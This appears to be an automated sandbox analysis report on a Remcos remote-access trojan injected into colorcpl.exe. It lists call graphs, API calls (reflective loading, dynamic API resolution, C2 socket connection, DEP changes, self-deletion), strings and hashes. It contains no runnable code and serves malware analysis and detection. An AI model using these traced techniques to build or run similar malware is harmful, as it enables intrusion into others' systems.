466f82f 95001->95021 95002 4669097 28 API calls 95002->95021 95004 4669097 28 API calls 95003->95004 95007 466f8ac 95004->95007 95005->95001 95006 467bcef 28 API calls 95006->95021 95009 467bcef 28 API calls 95007->95009 95010 466f8b8 95009->95010 95034 467384f 14 API calls 95010->95034 95013 4661f09 11 API calls 95013->95021 95014 466f8cb 95015 4661f09 11 API calls 95014->95015 95017 466f8d7 95015->95017 95016 4662093 28 API calls 95016->95021 95018 4662093 28 API calls 95017->95018 95019 466f8e8 95018->95019 95022 46737aa 14 API calls 95019->95022 95020 46737aa 14 API calls 95020->95021 95021->95002 95021->95005 95021->95006 95021->95013 95021->95016 95021->95020 95032 466d0d1 112 API calls ___scrt_get_show_window_mode 95021->95032 95033 467384f 14 API calls 95021->95033 95023 466f8fb 95022->95023 95035 467288b TerminateProcess WaitForSingleObject 95023->95035 95025 466f903 ExitProcess 95036 4672829 62 API calls 95027->95036 95033->95021 95034->95014 95035->95025 95037 46a37ce 95038 46a37f0 95037->95038 95039 46a37d7 95037->95039 95040 46a37df 95039->95040 95044 46a382c 95039->95044 95042 46a37e7 95042->95040 95057 46a3ad3 22 API calls 2 library calls 95042->95057 95045 46a3838 95044->95045 95046 46a3835 95044->95046 95047 46af0d9 49 API calls 95045->95047 95046->95042 95048 46a383f 95047->95048 95058 46af3da GetEnvironmentStringsW 95048->95058 95051 46a384a 95072 46a6802 20 API calls __dosmaperr 95051->95072 95054 46a387f 95054->95042 95055 46a3855 95071 46a6802 20 API calls __dosmaperr 95055->95071 95057->95038 95059 46af3f1 95058->95059 95069 46af444 95058->95069 95062 46af3f7 WideCharToMultiByte 95059->95062 95060 46af44d FreeEnvironmentStringsW 95061 46a3844 95060->95061 95061->95051 95070 46a38d9 26 API calls 4 library calls 95061->95070 95063 46af413 95062->95063 95062->95069 95073 46a61b8 95063->95073 95066 46af436 95080 46a6802 20 API calls __dosmaperr 95066->95080 95067 46af420 WideCharToMultiByte 95067->95066 95069->95060 95069->95061 95070->95055 95071->95051 95072->95054 95074 46a61f6 95073->95074 95078 46a61c6 ___crtLCMapStringA 95073->95078 95082 46a062d 20 API calls __dosmaperr 95074->95082 95075 46a61e1 RtlAllocateHeap 95077 46a61f4 95075->95077 95075->95078 95077->95066 95077->95067 95078->95074 95078->95075 95081 46a3001 7 API calls 2 library calls 95078->95081 95080->95069 95081->95078 95082->95077 95083 6701085 95085 67010dc 95083->95085 95088 6701103 95085->95088 95089 6701135 95088->95089 95090 6701255 VirtualAlloc 95089->95090 95097 67010f2 95089->95097 95091 6701285 VirtualAlloc 95090->95091 95094 6701298 GetPEB 95090->95094 95091->95094 95091->95097 95093 6701419 GetPEB 95093->95097 95095 6701361 95094->95095 95095->95093 95096 67013ca LoadLibraryA 95095->95096 95096->95095 95096->95097 95098 46a37fd 95099 46a381f 95098->95099 95100 46a3806 95098->95100 95101 46a380e 95100->95101 95105 46a3885 95100->95105 95103 46a3816 95103->95101 95116 46a3b52 22 API calls 2 library calls 95103->95116 95106 46a388e 95105->95106 95107 46a3891 95105->95107 95106->95103 95117 46af45d GetEnvironmentStringsW 95107->95117 95110 46a389e 95142 46a6802 20 API calls __dosmaperr 95110->95142 95113 46a38d3 95113->95103 95114 46a38a9 95141 46a6802 20 API calls __dosmaperr 95114->95141 95116->95099 95118 46a3898 95117->95118 95119 46af471 95117->95119 95118->95110 95124 46a39aa 95118->95124 95120 46a61b8 ___crtLCMapStringA 21 API calls 95119->95120 95121 46af485 _Yarn 95120->95121 95143 46a6802 20 API calls __dosmaperr 95121->95143 95123 46af49f FreeEnvironmentStringsW 95123->95118 95127 46a39c8 95124->95127 95126 46a3a73 95155 46a6802 20 API calls __dosmaperr 95126->95155 95127->95127 95144 46a5b74 95127->95144 95129 46a3a8d 95129->95114 95130 46a5b74 __Getctype 20 API calls 95137 46a3a02 95130->95137 95131 46a3a75 95153 46a3aa4 20 API calls _free 95131->95153 95134 46a3a7b 95154 46a6802 20 API calls __dosmaperr 95134->95154 95136 46a3a97 95156 469bd68 11 API calls _Atexit 95136->95156 95137->95126 95137->95130 95137->95131 95137->95136 95151 46a7be1 20 API calls 2 library calls 95137->95151 95152 46a6802 20 API calls __dosmaperr 95137->95152 95140 46a3aa3 95141->95110 95142->95113 95143->95123 95145 46a5b81 ___crtLCMapStringA 95144->95145 95146 46a5bc1 95145->95146 95147 46a5bac RtlAllocateHeap 95145->95147 95157 46a3001 7 API calls 2 library calls 95145->95157 95158 46a062d 20 API calls __dosmaperr 95146->95158 95147->95145 95149 46a5bbf 95147->95149 95149->95137 95151->95137 95152->95137 95153->95134 95154->95126 95155->95129 95156->95140 95157->95145 95158->95149

                                                                            Executed Functions

                                                                            Function 0466F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 04673584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 046735A4
                                                                              • Part of subcall function 04673584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,046D52F0), ref: 046735C2
                                                                              • Part of subcall function 04673584: RegCloseKey.KERNEL32(?), ref: 046735CD
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0466F896
                                                                            • ExitProcess.KERNEL32 ref: 0466F905
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                            • String ID: 5.1.2 Pro$override$pth_unenc
                                                                            • API String ID: 2281282204-3554326054
                                                                            • Opcode ID: e62e64fd6673a460c8284ee11d5865838b42899646dae278e518b1e6eea6017d
                                                                            • Instruction ID: 57b9c007d36c3479670f04638d45cc38660d97062e50eabab91259e7daa73d17
                                                                            • Opcode Fuzzy Hash: e62e64fd6673a460c8284ee11d5865838b42899646dae278e518b1e6eea6017d
                                                                            • Instruction Fuzzy Hash: A621C161F1030067F6087B79986A9BE39AAABD1619F40441CE80B57384FE35BD058BEA
                                                                            Function 06701103 Relevance: 4.9, APIs: 3, Instructions: 359memorylibraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1217 6701103-6701130 1218 6701135-6701194 1217->1218 1218->1218 1219 670119a-67011da call 67014ef 1218->1219 1224 67011e0-6701203 1219->1224 1225 67014e5-67014ec 1219->1225 1224->1225 1227 6701209-6701229 1224->1227 1227->1225 1229 670122f-670124f 1227->1229 1229->1225 1231 6701255-6701283 VirtualAlloc 1229->1231 1232 6701285-6701292 VirtualAlloc 1231->1232 1233 6701298-67012bb 1231->1233 1232->1225 1232->1233 1234 67012bf-67012ce 1233->1234 1235 67012d0-67012e3 1234->1235 1236 67012e4-67012e5 1234->1236 1235->1236 1236->1234 1237 67012e7-67012ed 1236->1237 1238 670134b-670135f GetPEB 1237->1238 1239 67012ef-67012ff 1237->1239 1240 6701361 1238->1240 1241 6701364-670136a 1238->1241 1239->1238 1242 6701301 1239->1242 1240->1241 1244 670136c-6701372 1241->1244 1243 6701303-6701308 1242->1243 1243->1238 1245 670130a-670130f 1243->1245 1246 6701374-670137a 1244->1246 1247 670139b-670139d 1244->1247 1251 6701312-6701329 1245->1251 1246->1247 1248 670137c-6701382 1246->1248 1249 67013a3-67013ab 1247->1249 1250 670139f-67013a1 1247->1250 1248->1247 1252 6701384-6701399 1248->1252 1255 6701419-6701426 GetPEB 1249->1255 1256 67013ad-67013b0 1249->1256 1250->1244 1253 6701332-6701333 1251->1253 1254 670132b-6701330 1251->1254 1252->1249 1257 6701335 1253->1257 1258 670133d-670133e 1253->1258 1259 6701338-670133b 1254->1259 1260 6701429-670142f 1255->1260 1261 67013b2-67013b7 1256->1261 1257->1259 1264 6701342-6701344 1258->1264 1266 6701340 1258->1266 1259->1264 1262 67014d1-67014d6 1260->1262 1263 6701435-670143f 1260->1263 1261->1255 1265 67013b9-67013c5 1261->1265 1262->1260 1269 67014dc-67014e2 1262->1269 1263->1262 1273 6701445-6701452 1263->1273 1264->1251 1270 6701346-6701349 1264->1270 1267 67013c7 1265->1267 1268 67013ca-67013d9 LoadLibraryA 1265->1268 1266->1264 1267->1268 1268->1225 1272 67013df 1268->1272 1269->1225 1270->1243 1274 67013e1-67013e8 1272->1274 1273->1262 1275 6701454 1273->1275 1276 6701414-6701417 1274->1276 1277 67013ea-67013f0 1274->1277 1278 6701456-670145f 1275->1278 1276->1261 1279 67013f2-67013f8 1277->1279 1280 67013fa-67013fd 1277->1280 1278->1262 1281 6701461-670146c 1278->1281 1282 67013fe-6701412 1279->1282 1280->1282 1283 6701473-6701476 1281->1283 1284 670146e-6701471 1281->1284 1282->1274 1283->1278 1284->1283 1286 6701478-670149f 1284->1286 1286->1262 1289 67014a1-67014a2 1286->1289 1290 67014a4-67014a7 1289->1290 1291 67014b2-67014cf 1290->1291 1292 67014a9-67014b0 1290->1292 1291->1283 1292->1290
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 0670127E
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 0670128E
                                                                            • LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 067013D5
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, Offset: 06700000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_6700000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual$LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 2441068224-0
                                                                            • Opcode ID: c48d9d0de19bfb502c6818de9c29b524ab755fb6d98b0271e3d11d7ca3555044
                                                                            • Instruction ID: a72cb98d21b63a64fd96cdcd6ca29f3ae2c9b08ae85601c43f0237e6c787a75e
                                                                            • Opcode Fuzzy Hash: c48d9d0de19bfb502c6818de9c29b524ab755fb6d98b0271e3d11d7ca3555044
                                                                            • Instruction Fuzzy Hash: 94D1B172E00205EFEB64CFA9CC84BA9B7F5FF84314F548169E815AB695D770E901CBA0
                                                                            Function 0467B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserNameW.ADVAPI32(?,0466F25E), ref: 0467B6D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: NameUser
                                                                            • String ID:
                                                                            • API String ID: 2645101109-0
                                                                            • Opcode ID: d90d30d64c1468cf157f2b66ea7e5e7b2de1e32a84fd1c1e91c96d2d7557c90f
                                                                            • Instruction ID: d56f4aeb0d8b5ceaf6a7ff5726c9b16ef67b709fe02c74ea28edd8155950ea17
                                                                            • Opcode Fuzzy Hash: d90d30d64c1468cf157f2b66ea7e5e7b2de1e32a84fd1c1e91c96d2d7557c90f
                                                                            • Instruction Fuzzy Hash: C601FF7190011CABDB04EBD4DC54AEDB7BCEF44309F10015AA506A2150FE746E89CB98
                                                                            Function 0466EA00 Relevance: 49.8, APIs: 15, Strings: 13, Instructions: 795COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 5 466ea00-466ea82 call 467cbe1 GetModuleFileNameW call 466f3fe call 46620f6 * 2 call 467beac call 466fb52 call 4661e8d call 469fd50 22 466ea84-466eac9 call 466fbee call 4661e65 call 4661fab call 4670f72 call 466fb9f call 466f3eb 5->22 23 466eace-466eb96 call 4661e65 call 4661fab call 4661e65 call 466531e call 4666383 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4661fc0 call 4665aa6 call 4661e65 call 46651e3 call 4661e65 call 46651e3 5->23 48 466ef2d-466ef3e call 4661fd8 22->48 69 466eb98-466ebe3 call 4666c59 call 4661fe2 call 4661fd8 call 4661fab call 4673584 23->69 70 466ebe9-466ec04 call 4661e65 call 466b9f8 23->70 69->70 102 466f38a-466f3a5 call 4661fab call 46739e4 call 46724b0 69->102 79 466ec06-466ec25 call 4661fab call 4673584 70->79 80 466ec3e-466ec45 call 466d0a4 70->80 79->80 98 466ec27-466ec3d call 4661fab call 46739e4 79->98 90 466ec47-466ec49 80->90 91 466ec4e-466ec55 80->91 94 466ef2c 90->94 95 466ec57 91->95 96 466ec59-466ec65 call 467b354 91->96 94->48 95->96 103 466ec67-466ec69 96->103 104 466ec6e-466ec72 96->104 98->80 124 466f3aa-466f3db call 467bcef call 4661f04 call 4673a5e call 4661f09 * 2 102->124 103->104 107 466ec74 call 4667751 104->107 108 466ecb1-466ecc4 call 4661e65 call 4661fab 104->108 116 466ec79-466ec7b 107->116 130 466ecc6 call 4667790 108->130 131 466eccb-466ed53 call 4661e65 call 467bcef call 4661f13 call 4661f09 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab 108->131 120 466ec87-466ec9a call 4661e65 call 4661fab 116->120 121 466ec7d-466ec82 call 4667773 call 466729b 116->121 120->108 141 466ec9c-466eca2 120->141 121->120 157 466f3e0-466f3ea call 466dd7d call 4674f65 124->157 130->131 177 466ed55-466ed6e call 4661e65 call 4661fab call 469bb56 131->177 178 466edbb-466edbf 131->178 141->108 144 466eca4-466ecaa 141->144 144->108 147 466ecac call 466729b 144->147 147->108 177->178 205 466ed70-466edb6 call 4661e65 call 4661fab call 4661e65 call 4661fab call 466da6f call 4661f13 call 4661f09 177->205 180 466edc5-466edcc 178->180 181 466ef41-466efa1 call 4696f10 call 466247c call 4661fab * 2 call 4673733 call 4669092 178->181 182 466edce-466ee48 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 466ce34 180->182 183 466ee4a-466ee54 call 4669092 180->183 233 466efa6-466effa call 4661e65 call 4661fab call 4662093 call 4661fab call 46737aa call 4661e65 call 4661fab call 469bb2c 181->233 192 466ee59-466ee7d call 466247c call 4694829 182->192 183->192 213 466ee7f-466ee8a call 4696f10 192->213 214 466ee8c 192->214 205->178 216 466ee8e-466eed9 call 4661f04 call 469f859 call 466247c call 4661fab call 466247c call 4661fab call 4673982 213->216 214->216 271 466eede-466ef03 call 4694832 call 4661e65 call 466b9f8 216->271 286 466f017-466f019 233->286 287 466effc 233->287 271->233 288 466ef09-466ef28 call 4661e65 call 467bcef call 466f4af 271->288 290 466f01f 286->290 291 466f01b-466f01d 286->291 289 466effe-466f015 call 467ce2c CreateThread 287->289 288->233 306 466ef2a 288->306 294 466f025-466f101 call 4662093 * 2 call 467b580 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 469bb2c call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab call 4661e65 call 4661fab StrToIntA call 4669e1f call 4661e65 call 4661fab 289->294 290->294 291->289 344 466f103-466f13a call 469455e call 4661e65 call 4661fab CreateThread 294->344 345 466f13c 294->345 306->94 347 466f13e-466f156 call 4661e65 call 4661fab 344->347 345->347 356 466f194-466f1a7 call 4661e65 call 4661fab 347->356 357 466f158-466f18f call 469455e call 4661e65 call 4661fab CreateThread 347->357 368 466f207-466f21a call 4661e65 call 4661fab 356->368 369 466f1a9-466f202 call 4661e65 call 4661fab call 4661e65 call 4661fab call 466da23 call 4661f13 call 4661f09 CreateThread 356->369 357->356 379 466f255-466f279 call 467b69e call 4661f13 call 4661f09 368->379 380 466f21c-466f250 call 4661e65 call 4661fab call 4661e65 call 4661fab call 469bb2c call 466c19d 368->380 369->368 400 466f27e-466f291 CreateThread 379->400 401 466f27b-466f27c SetProcessDEPPolicy 379->401 380->379 404 466f293-466f29d CreateThread 400->404 405 466f29f-466f2a6 400->405 401->400 404->405 408 466f2b4-466f2bb 405->408 409 466f2a8-466f2b2 CreateThread 405->409 412 466f2bd-466f2c0 408->412 413 466f2c9 408->413 409->408 415 466f307-466f31a call 4661fab call 467353a 412->415 416 466f2c2-466f2c7 412->416 418 466f2ce-466f302 call 4662093 call 46652fd call 4662093 call 467b580 call 4661fd8 413->418 426 466f31f-466f322 415->426 416->418 418->415 426->157 428 466f328-466f368 call 467bcef call 4661f04 call 4673656 call 4661f09 call 4661f04 426->428 443 466f381-466f386 DeleteFileW 428->443 444 466f36a-466f36d 443->444 445 466f388 443->445 444->124 446 466f36f-466f37c Sleep call 4661f04 444->446 445->124 446->443
                                                                            APIs
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0466EA1C), ref: 0467CBF6
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CBFF
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0466EA1C), ref: 0467CC16
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC19
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0466EA1C), ref: 0467CC2B
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC2E
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0466EA1C), ref: 0467CC3F
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC42
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0466EA1C), ref: 0467CC54
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC57
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0466EA1C), ref: 0467CC63
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC66
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0466EA1C), ref: 0467CC77
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC7A
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0466EA1C), ref: 0467CC8B
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CC8E
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0466EA1C), ref: 0467CC9F
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCA2
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0466EA1C), ref: 0467CCB3
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCB6
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0466EA1C), ref: 0467CCC7
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCCA
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0466EA1C), ref: 0467CCDB
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCDE
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0466EA1C), ref: 0467CCEF
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CCF2
                                                                              • Part of subcall function 0467CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0466EA1C), ref: 0467CD03
                                                                              • Part of subcall function 0467CBE1: GetProcAddress.KERNEL32(00000000), ref: 0467CD06
                                                                              • Part of subcall function 0467CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0466EA1C), ref: 0467CD14
                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\colorcpl.exe,00000104), ref: 0466EA29
                                                                              • Part of subcall function 04670F72: __EH_prolog.LIBCMT ref: 04670F77
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                            • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                                            • API String ID: 2830904901-2432426600
                                                                            • Opcode ID: 9e73d01a397d0ca31ea812f80f37e70608064ef6f0a13ce6013014b653ff4a5a
                                                                            • Instruction ID: d9ff29b2d4ea7716f3e5ab8bb5b915e8db3978b79283fb79effb5a6c4f0d6728
                                                                            • Opcode Fuzzy Hash: 9e73d01a397d0ca31ea812f80f37e70608064ef6f0a13ce6013014b653ff4a5a
                                                                            • Instruction Fuzzy Hash: A332E460F043446BFB18BB74DC65ABE26D99F8264CF40082DE5439B2C1FE69FD0587A9
                                                                            Function 04674F65 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 809sleepnetworkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 448 4674f65-4674fad call 46620df call 467b944 call 46620df call 4661e65 call 4661fab call 469bb2c 461 4674faf-4674fb6 Sleep 448->461 462 4674fbc-4675008 call 4662093 call 4661e65 call 46620f6 call 467beac call 466489e call 4661e65 call 466b9f8 448->462 461->462 477 467507c-4675117 call 4662093 call 4661e65 call 46620f6 call 467beac call 4661e65 * 2 call 4666c59 call 4662f10 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4665b05 462->477 478 467500a-4675079 call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 466473d 462->478 531 4675127-467512e 477->531 532 4675119-4675125 477->532 478->477 533 4675133-46751c5 call 4665aa6 call 466531e call 4666383 call 4662f10 call 4662093 call 467b580 call 4661fd8 * 2 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4674f24 531->533 532->533 560 46751c7-467520b WSAGetLastError call 467cb72 call 46652fd call 4662093 call 467b580 call 4661fd8 533->560 561 4675210-467521e call 466482d 533->561 584 4675ade-4675af0 call 4664e26 call 46621fa 560->584 567 4675220-4675246 call 4662093 * 2 call 467b580 561->567 568 467524b-4675260 call 4664f51 call 46648c8 561->568 567->584 583 4675266-46753b9 call 4661e65 * 2 call 466531e call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662093 call 467b580 call 4661fd8 * 4 call 467b871 call 46745f8 call 4669097 call 46a1ed1 call 4661e65 call 46620f6 call 466247c call 4661fab * 2 call 4673733 568->583 568->584 648 46753cd-46753f4 call 4661fab call 46735e1 583->648 649 46753bb-46753c8 call 4665aa6 583->649 596 4675af2-4675b12 call 4661e65 call 4661fab call 469bb2c Sleep 584->596 597 4675b18-4675b20 call 4661e8d 584->597 596->597 597->477 655 46753f6-46753f8 648->655 656 46753fb-4675a45 call 466417e call 466ddc4 call 467bcd3 call 467bdaf call 467bc1f call 4661e65 GetTickCount call 467bc1f call 467bb77 call 467bc1f * 2 call 467bb27 call 467bdaf * 5 call 466f90c call 467bdaf call 4662f31 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 3 call 4662ea1 call 4662f10 call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4666383 call 4662f10 * 5 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 7 call 4662ea1 call 4664aa1 call 4661fd8 * 50 call 4661f09 call 4661fd8 * 6 call 4661f09 call 4664c10 648->656 649->648 655->656 901 4675a4a-4675a51 656->901 902 4675a65-4675a6c 901->902 903 4675a53-4675a5a 901->903 905 4675a6e-4675a73 call 466b08c 902->905 906 4675a78-4675aaa call 4665a6b call 4662093 * 2 call 467b580 902->906 903->902 904 4675a5c-4675a5e 903->904 904->902 905->906 917 4675abe-4675ad9 call 4661fd8 * 2 call 4661f09 906->917 918 4675aac-4675ab8 CreateThread 906->918 917->584 918->917
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000,00000029,046D52F0,046D50E4,00000000), ref: 04674FB6
                                                                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 046751C7
                                                                            • Sleep.KERNEL32(00000000,00000002), ref: 04675B12
                                                                              • Part of subcall function 0467B580: GetLocalTime.KERNEL32(00000000), ref: 0467B59A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Sleep$ErrorLastLocalTime
                                                                            • String ID: | $%I64u$5.1.2 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                            • API String ID: 524882891-3072554048
                                                                            • Opcode ID: 28ca322d3547a885e91361e286d091fbbe424122b7a90e34c6589f307e2179da
                                                                            • Instruction ID: 88b11cb1ea0263f02bb99143a7ae78968a0fb0bb8f9f7671d1c4e708fdd4ed58
                                                                            • Opcode Fuzzy Hash: 28ca322d3547a885e91361e286d091fbbe424122b7a90e34c6589f307e2179da
                                                                            • Instruction Fuzzy Hash: D5523771E001189BEB18FB31ECA5AFEB3A59F55208F5045EDD40BA6194FF307E868E58
                                                                            Function 046648C8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • connect.WS2_32(?,?,?), ref: 046648E0
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04664A00
                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04664A0E
                                                                            • WSAGetLastError.WS2_32 ref: 04664A21
                                                                              • Part of subcall function 0467B580: GetLocalTime.KERNEL32(00000000), ref: 0467B59A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_4660000_colorcpl.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                            • API String ID: 994465650-2151626615
                                                                            • Opcode ID: 41f88e7b50046dc2c9e29df0cb5d0fcc6506e4aa925e995c62f60c80ee56535b
                                                                            • Instruction ID: 9267dc02325776818435ef4cf193accfdece1f59e8f55d7c587a54da89f62917
                                                                            • Opcode Fuzzy Hash: 41f88e7b50046dc2c9e29df0cb5d0fcc6506e4aa925e995c62f60c80ee56535b
                                                                            • Instruction Fuzzy Hash: 3B41E665B502067BFB18BB79CD5A47DBB55EB5120CB40026CD80347A85FE62BC248FEB
                                                                            Function 04664E26 Relevance: 18.1, APIs: 12, Instructions: 65synchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,046D4EF8,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E38
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E43
                                                                            • CloseHandle.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E4C
                                                                            • closesocket.WS2_32(?), ref: 04664E5A
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664E91
                                                                            • SetEvent.KERNEL32(?,?,00000000,046D4EF8,04664CA8,00000000,?,?,00000000,046D4EF8,04664AC9), ref: 04664EA2
